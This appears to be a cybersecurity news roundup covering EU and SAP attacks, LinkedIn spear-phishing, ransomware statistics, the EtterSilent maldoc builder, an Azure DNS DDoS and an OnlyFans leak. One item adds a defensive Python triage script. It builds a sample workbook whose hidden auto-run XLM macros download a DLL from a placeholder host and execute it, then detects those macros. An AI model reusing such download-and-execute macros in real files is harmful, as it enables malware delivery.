European Union institutions targeted in a cyber-attack
The attack, which occurred last week, affected a range of European Union institutions including the European Commission, which confirmed that a number of EU bodies “experienced an IT security incident in their IT infrastructure.” Forensic analysis of the incident is still in its initial phase, with no conclusive information yet available about the nature of the attack; however, a representative stated that, “Thus far, no major information breach was detected.” The attack was serious enough for senior officials at the Commission to be alerted, as it was larger than the attacks that regularly hit the EU.
LinkedIn spear-phishing campaign uses custom decoy job offers
A new spear-phishing campaign is targeting LinkedIn members with customized job offers in order to deliver a sophisticated backdoor trojan called “more_eggs.” The lure is a malicious ZIP archive whose file name mirrors the victim’s job title as listed on their LinkedIn profile: if a member’s job is listed as “Senior Account Executive—International Freight,” the malicious ZIP would be titled “Senior Account Executive—International Freight position.” Opening the fake job offer silently starts the installation of the more_eggs trojan. With the COVID pandemic contributing to job losses, the phish preys on job seekers who are desperate to find employment.
Ransomware attacks increased by 485% in 2020 over 2019
This data comes from Bitdefender’s 2020 Consumer Threat Landscape Report. Among the highlights: two-thirds of the ransomware attacks took place in the first two quarters of 2020. Proprietary operating systems used in IoT devices accounted for 96% of all detected vulnerabilities, and Smart TV vulnerabilities surged 335% compared to 2019. In social engineering, Android was especially heavily targeted, with a 32% increase driven by apps impersonating video conferencing software and COVID-related medical apps. In addition, a 189% year-on-year increase in vulnerabilities in network-attached storage (NAS) devices was observed.
On-premises SAP systems targeted within hours after release of security patches
SAP and cybersecurity firm Onapsis, together with CISA and Germany’s Federal Office for Information Security (BSI), are warning SAP customers to install security updates as soon as they become available and to assess their on-premises installations. Threat actors are attacking mission-critical SAP applications directly, seeking to modify configurations and exfiltrate sensitive business information. The report states that SAP vulnerabilities are being weaponized in less than 72 hours after the release of patches, and that new, unprotected SAP applications provisioned in cloud (IaaS) environments are being discovered and compromised in less than three hours. It adds that these threats may also have regulatory compliance implications for organizations that have not properly secured the SAP applications that process regulated data.
Thanks to our episode sponsor, Sotero
EtterSilent maldoc builder used by top cybercriminal gang
A malicious document builder named EtterSilent is gaining attention on underground forums, with ads boasting that it bypasses Windows Defender, Windows AMSI (Antimalware Scan Interface), and popular email services including Gmail. An EtterSilent maldoc with macro code can pose as a DocuSign or DigiCert document that asks the user to enable macros, which then download a payload in the background. The maldoc uses Excel 4.0 (XLM) macros stored in a hidden sheet to download an externally hosted payload, write it to disk, and execute it. From there, attackers can follow up by dropping other assorted malware.
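As an added triage example (not code from EtterSilent, its authors, or any vendor named in this story), the Python below constructs a small OOXML workbook in memory that carries the indicators this item describes, a veryHidden Excel 4.0 macro sheet, an Auto_Open entry point, and formulas that download, write and run a payload, and then scans the container for those indicators. The workbook contents, the placeholder host example.invalid, the file paths and the scoring thresholds are all assumptions made for illustration.

```python
"""Triage an OOXML Excel workbook (.xlsm) for hidden Excel 4.0 (XLM) macro sheets.

Added example, not EtterSilent's code. Builds a constructed sample workbook in
memory, then checks it for: a hidden/veryHidden sheet, a macrosheet part, an
Auto_Open entry point, and XLM functions that fetch, write and execute a payload.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN_NS}

# Constructed sample parts (assumption). Host and paths are placeholders, not real IOCs.
WORKBOOK_XML = f"""<?xml version="1.0" encoding="UTF-8"?>
<workbook xmlns="{MAIN_NS}"
          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheets>
    <sheet name="Invoice" sheetId="1" r:id="rId1"/>
    <sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName>
  </definedNames>
</workbook>"""

MACROSHEET_XML = f"""<?xml version="1.0" encoding="UTF-8"?>
<macrosheet xmlns="{MAIN_NS}">
  <sheetData>
    <row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/p.dll","C:\\Users\\Public\\p.dll",0,0)</f></c></row>
    <row r="2"><c r="A2"><f>EXEC("rundll32 C:\\Users\\Public\\p.dll,Start")</f></c></row>
    <row r="3"><c r="A3"><f>HALT()</f></c></row>
  </sheetData>
</macrosheet>"""

# XLM functions that reach outside the workbook: native calls, process launch, self-modifying formulas.
SUSPICIOUS_XLM = re.compile(
    r"\b(CALL|EXEC|REGISTER|FORMULA(?:\.FILL)?|URLDownloadToFile\w*|ShellExecute\w*)\b", re.I)


def build_sample_xlsm() -> bytes:
    """Write the constructed parts into an in-memory OOXML (zip) container."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", WORKBOOK_XML)
        z.writestr("xl/worksheets/sheet1.xml", f'<worksheet xmlns="{MAIN_NS}"/>')
        z.writestr("xl/macrosheets/sheet1.xml", MACROSHEET_XML)
    return buf.getvalue()


def triage_ooxml(data: bytes) -> dict:
    """Return the XLM-related indicators found in an OOXML workbook."""
    findings = {"hidden_sheets": [], "macrosheets": [], "auto_open": False, "suspicious_formulas": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        # Excel 4.0 macro sheets are stored under xl/macrosheets/; a clean workbook has none.
        findings["macrosheets"] = [n for n in z.namelist() if n.startswith("xl/macrosheets/")]
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        for sheet in wb.findall("m:sheets/m:sheet", NS):
            state = sheet.get("state", "visible")
            if state in ("hidden", "veryHidden"):  # veryHidden cannot be unhidden from the Excel UI
                findings["hidden_sheets"].append((sheet.get("name"), state))
        for dn in wb.findall("m:definedNames/m:definedName", NS):
            # An Auto_Open name runs the macro as soon as the user enables macros.
            if dn.get("name", "").lower().endswith("auto_open"):
                findings["auto_open"] = True
        for part in findings["macrosheets"]:
            sheet_xml = ET.fromstring(z.read(part))
            for f in sheet_xml.iter(f"{{{MAIN_NS}}}f"):
                if f.text and SUSPICIOUS_XLM.search(f.text):
                    findings["suspicious_formulas"].append(f.text)
    return findings


def verdict(findings: dict) -> str:
    """Score the findings; payload-fetching formulas in a hidden, auto-run sheet is the pattern described above."""
    score = (bool(findings["macrosheets"]) + bool(findings["hidden_sheets"])
             + bool(findings["auto_open"]) + 2 * bool(findings["suspicious_formulas"]))
    if score >= 4:
        return "malicious"
    return "suspicious" if score >= 2 else "clean"


if __name__ == "__main__":
    result = triage_ooxml(build_sample_xlsm())
    for key, value in result.items():
        print(f"{key}: {value}")
    print("verdict:", verdict(result))
```

This only covers the OOXML (.xlsm) container. Documents delivered as legacy binary .xls need a BIFF-aware parser such as oletools’ olevba or XLMMacroDeobfuscator, and real samples commonly split and obfuscate the formula strings, so treat the regex match as a first-pass indicator rather than a verdict.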
Microsoft reveals last week’s two-hour Azure outage was caused by DNS DDoS
Following up on a story we brought you on Monday, Microsoft has confirmed that its April 1 outage was caused by an anomalous surge of DNS queries from all over the world targeting certain domains hosted on Azure. The outage prevented users from accessing or signing into numerous Microsoft services. Microsoft did not say who was responsible for the attack, whose success was unusual against a target as large and well-defended as Azure, but stated, “In this incident, one specific sequence of events exposed a code defect in our DNS service that reduced the efficiency of our DNS Edge caches.”
Industrial Control Systems are becoming a favorite target for threat actors
A new report from Kaspersky confirms that 33.4% of Industrial Control System (ICS) computers worldwide were hit by a cyberattack in the second half of 2020. Citing two of the better-known examples, the China-linked group RedEcho targeting the Indian power sector and an unidentified attacker attempting to poison a Florida city’s water supply through its treatment plant, the report states that the attacks have not just evolved but have become a “life-threatening” affair and are on an upswing, with the U.S., Canada, and Saudi Arabia experiencing the largest increases.
Adult content from hundreds of OnlyFans creators leaked online
OnlyFans is a website that allows content creators to earn money by sharing images, videos, and live streams with fans who pay to subscribe. While it is promoted as a way for celebrities and social influencers to share their content, it is also heavily used to share adult content with paying fans. Last month, researchers at cybersecurity firm BackChannel found a post on a hacking forum in which a member shared a Google Drive containing folders for 279 OnlyFans creators, one of which held over 10GB of videos and photos. BackChannel has created an ‘OnlyFans Lookup Tool’ web page that lets OnlyFans creators enter their member name and determine whether their content has been shared without permission; if it has, they must report the individual files to Google for copyright infringement to have them removed from Google Drive.